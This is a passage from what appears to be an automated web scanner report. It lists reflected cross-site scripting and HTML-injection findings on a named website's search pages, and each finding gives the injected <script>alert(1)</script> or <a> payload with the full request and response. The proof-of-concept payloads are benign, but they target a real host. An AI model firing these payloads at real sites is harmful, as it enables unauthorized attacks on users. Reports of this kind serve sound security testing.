This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/imagesdf053<script>alert(1)</script>6c8aaf55634/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/imagesdf053<script>alert(1)</script>6c8aaf55634/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2702. http://www.resellerbase.com/detail/39/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 277cd<script>alert(1)</script>ef56d56f8b3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/images/search.php277cd<script>alert(1)</script>ef56d56f8b3?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/search.php277cd<script>alert(1)</script>ef56d56f8b3?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2703. http://www.resellerbase.com/detail/39/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 4068a<a>43b7004a54c was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/themes/kosmos/images/search.php?keyword=search...&Submit3=Search4068a<a>43b7004a54c&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/search.php?keyword=search...&Submit3=Search4068a<a>43b7004a54c&opt=2 was not found on this server.</p>
...[SNIP]...

2.2704. http://www.resellerbase.com/detail/39/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f53a6<a>170e93f60e4 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/themes/kosmos/images/search.php?keyword=search...f53a6<a>170e93f60e4&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/search.php?keyword=search...f53a6<a>170e93f60e4&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2705. http://www.resellerbase.com/detail/39/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 44910<script>alert(1)</script>8ed64770685 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&44910<script>alert(1)</script>8ed64770685=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&44910<script>alert(1)</script>8ed64770685=1 was not found on this server.</p>
...[SNIP]...

2.2706. http://www.resellerbase.com/detail/39/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 87dc0<a>d038432238f was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=287dc0<a>d038432238f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=287dc0<a>d038432238f was not found on this server.</p>
...[SNIP]...

2.2707. http://www.resellerbase.com/detail/39/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c1136<script>alert(1)</script>9d698537923 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc1136<script>alert(1)</script>9d698537923/39/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc1136<script>alert(1)</script>9d698537923/39/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2708. http://www.resellerbase.com/detail/39/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a12cd<script>alert(1)</script>851759873ee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39a12cd<script>alert(1)</script>851759873ee/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39a12cd<script>alert(1)</script>851759873ee/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2709. http://www.resellerbase.com/detail/39/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b32c<script>alert(1)</script>2310031afc7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes5b32c<script>alert(1)</script>2310031afc7/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes5b32c<script>alert(1)</script>2310031afc7/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2710. http://www.resellerbase.com/detail/39/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fdad5<script>alert(1)</script>0f2c953672d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmosfdad5<script>alert(1)</script>0f2c953672d/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmosfdad5<script>alert(1)</script>0f2c953672d/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2711. http://www.resellerbase.com/detail/39/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1b4c0<script>alert(1)</script>b5eb68fe310 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/search.php1b4c0<script>alert(1)</script>b5eb68fe310?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/search.php1b4c0<script>alert(1)</script>b5eb68fe310?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2712. http://www.resellerbase.com/detail/39/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 842b0<a>9b66c5eed84 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/themes/kosmos/search.php?keyword=search...&Submit3=Search842b0<a>9b66c5eed84&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/search.php?keyword=search...&Submit3=Search842b0<a>9b66c5eed84&opt=2 was not found on this server.</p>
...[SNIP]...

2.2713. http://www.resellerbase.com/detail/39/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload d300b<a>803eff7eab0 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/themes/kosmos/search.php?keyword=search...d300b<a>803eff7eab0&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/search.php?keyword=search...d300b<a>803eff7eab0&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2714. http://www.resellerbase.com/detail/39/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 67156<script>alert(1)</script>a64337dcb47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&67156<script>alert(1)</script>a64337dcb47=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&67156<script>alert(1)</script>a64337dcb47=1 was not found on this server.</p>
...[SNIP]...

2.2715. http://www.resellerbase.com/detail/39/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 369df<a>ae2faa7ccaa was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2369df<a>ae2faa7ccaa HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2369df<a>ae2faa7ccaa was not found on this server.</p>
...[SNIP]...

2.2716. http://www.resellerbase.com/detail/39/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 620e0<script>alert(1)</script>e566132327 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail620e0<script>alert(1)</script>e566132327/39/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail620e0<script>alert(1)</script>e566132327/39/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2717. http://www.resellerbase.com/detail/39/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1cfa5<script>alert(1)</script>f9e95d2203c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/391cfa5<script>alert(1)</script>f9e95d2203c/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/391cfa5<script>alert(1)</script>f9e95d2203c/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2718. http://www.resellerbase.com/detail/39/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3cd81<script>alert(1)</script>048ef6477b5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes3cd81<script>alert(1)</script>048ef6477b5/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes3cd81<script>alert(1)</script>048ef6477b5/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2719. http://www.resellerbase.com/detail/39/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 34a3f<script>alert(1)</script>36c195c3224 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

